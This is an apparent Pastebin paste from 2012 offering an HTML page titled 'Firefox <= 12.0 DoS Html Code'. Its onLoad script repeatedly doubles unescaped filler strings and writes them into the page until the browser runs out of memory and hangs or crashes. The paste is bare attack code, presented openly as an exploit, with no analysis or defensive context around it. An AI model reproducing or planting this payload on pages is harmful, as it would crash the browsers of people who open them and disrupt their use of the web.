Advertisement
The_KGB

Firefox <= 12.0 DoS Html Code

May 9th, 2012
130
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.61 KB | None | 0 0
  1. <html>
  2. <title>FF go away :)</title>
  3. <head>
  4. <script>
  5. function FTB()
  6.  {
  7.     var A1 = unescape("%u4141%u4141");
  8.     var A2 = unescape("%u4242%u4242");
  9.     var A3 = unescape("%u4343%u4343");
  10.     var A4 = unescape("%u4444%u4444");
  11.     for(i=0; i <= 1000 ; ++i)
  12. {
  13.        A1+=A1;
  14.        A2+=A2;
  15.        A3+=A3;
  16.        A4+=A4;
  17.        document.write(A1);
  18.        document.write(A2);
  19.        document.write(A3);
  20.        document.write(A4);
  21.    }
  22.    document.write(A1);
  23.    document.write(A2);
  24.    document.write(A3);
  25.    document.write(A4);
  26. }
  27. </script>
  28. </head>
  29. <body onLoad="FTB()">
  30. </body>
  31. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement